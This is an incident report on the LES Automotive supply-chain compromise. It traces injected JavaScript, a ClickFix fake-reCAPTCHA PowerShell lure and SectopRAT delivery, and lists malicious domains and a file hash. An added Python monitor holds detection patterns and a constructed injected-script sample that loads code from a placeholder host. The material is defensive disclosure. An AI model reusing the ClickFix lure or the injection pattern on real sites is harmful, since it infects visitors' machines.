Cyber Incident Victim: LES Automotive

Date: Oct 2025

Location: United States of America

Summary

A supply-chain compromise of LES Automotive, a third-party video service used by auto dealerships, led to the injection of malicious JavaScript that presented a ClickFix page, tricking visitors into executing PowerShell commands that downloaded and installed the SectopRAT remote access trojan. The lure was a fake reCAPTCHA prompt, the injected code contained Russian-language comments, more than 100 dealership websites were affected, and the service provider later remediated the compromise.


Description

The incident began when the third-party video service domain associated with LES Automotive was compromised, allowing threat actors to inject malicious JavaScript into the file les_video_srp.js, which was loaded by more than one hundred auto dealership websites using the service. The injected script dynamically created a script element that fetched content from security-confirmation.help/captchav2, which in turn redirected visitors to a ClickFix page hosted at deliveryoka.com/webservice_ionic/captchav2.html. That page showed a fake reCAPTCHA prompt instructing users to open the Windows Run dialog, paste the contents of their clipboard, and press Enter; the page had silently placed a PowerShell command on the clipboard, so a user who followed the instructions executed it. The PowerShell command downloaded a base64-encoded payload from bitly.cx/UnluS, which redirected to main-login.sbs/maison/tree and then fetched a second Bitly link that delivered a file named Lancaster.zip to the victim's temporary folder. The ZIP archive was extracted and the executable zkwindow.exe was launched, installing the SectopRAT remote access trojan on the compromised machine. Analysis of the sample in a Triage sandbox returned the highest possible threat score, confirming the presence of SectopRAT.

Indicators of compromise identified in the investigation included the domains security-confirmation.help, deliveryoka.com, main-login.sbs, and bitly.cx, the specific URLs for the ClickFix page, the PowerShell downloader, and the Lancaster.zip file, and the archive's SHA-256 hash 1a34c9b4500cf7859c36c102209902202fb7188aca1ba759f2d5018bf2655cc1. The malicious JavaScript contained a Russian-language comment reading “Очистите предыдущий таймаут,” which translates to “Clear the previous timeout.” Researchers noted that most urlscan.io captures showed a benign version of the script, indicating that the injection was served dynamically and intermittently rather than on every request. The attack had been active since at least April 2024, as evidenced by the last-modified timestamp of the captchav2.html file on the compromised host, and it affected the websites of more than one hundred auto dealerships that relied on the LES Automotive video service.
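The chain above hinges on a trusted third-party script changing out from under the sites that load it, and the urlscan.io observation shows the change was intermittent, so a single clean fetch proves nothing. As an added example (not code from the incident write-up or from LES Automotive), this Python check compares each fetched copy of a script such as les_video_srp.js against a known-good SHA-256 and flags the ClickFix traits described in this entry; the script bodies and the placeholder host below are constructed.

```python
"""Baseline-plus-heuristic monitor for a third-party script (added example).

The sample script bodies are constructed stand-ins; the real injected
les_video_srp.js is not reproduced here.
"""
import hashlib
import re

# Heuristics drawn from the ClickFix chain described in the incident: a
# dynamically created <script> element, a clipboard write, PowerShell wording
# on the page, and (a weak signal) comments in a script that is normally ASCII.
PATTERNS = {
    "dynamic_script_element": re.compile(r"createElement\(\s*['\"]script['\"]\s*\)"),
    "clipboard_write": re.compile(r"clipboard\.writeText|execCommand\(\s*['\"]copy['\"]"),
    "powershell_lure": re.compile(r"powershell", re.IGNORECASE),
    "non_ascii_comment": re.compile(r"//[^\n]*[^\x00-\x7f]"),
}


def sha256_hex(body: str) -> str:
    return hashlib.sha256(body.encode("utf-8")).hexdigest()


def score_script(body: str) -> list:
    """Return the names of the ClickFix heuristics matched by a script body."""
    return [name for name, pat in PATTERNS.items() if pat.search(body)]


def check_script(body: str, baseline_hash: str) -> dict:
    """Compare one fetched copy against the known-good hash and run heuristics.

    Run this on every fetch: because the injection was intermittent, only a
    'changed' result on any single fetch is meaningful, not a clean average.
    """
    digest = sha256_hex(body)
    hits = score_script(body)
    return {"changed": digest != baseline_hash, "heuristics": hits,
            "alert": digest != baseline_hash or bool(hits)}


# Constructed benign and tampered versions; the host is a placeholder, not an IOC.
BENIGN_JS = "function playVideo(id){var v=document.getElementById(id);v.play();}\n"
TAMPERED_JS = BENIGN_JS + (
    "// Очистите предыдущий таймаут\n"
    "var s=document.createElement('script');s.src='https://PLACEHOLDER.invalid/x.js';\n"
    "document.head.appendChild(s);\n"
)
BASELINE = sha256_hex(BENIGN_JS)  # hash recorded when the script was last reviewed

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_JS), ("tampered", TAMPERED_JS)):
        print(label, check_script(body, BASELINE))
```

In production the baseline would be the hash of the vendor-reviewed file, and the same check can be enforced in the browser with a Subresource Integrity attribute on the script tag, which blocks a changed file instead of merely reporting it.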

In response to the discovery, LES Automotive remediated the compromised video service, removing the malicious JavaScript and restoring the legitimate version of les_video_srp.js. The remediation halted further delivery of the ClickFix payload to dealership visitors, and the IOCs were shared with security communities to enable blocking of the associated domains and file hashes. No additional details regarding post‑remediation monitoring or specific impact metrics were provided in the source material.
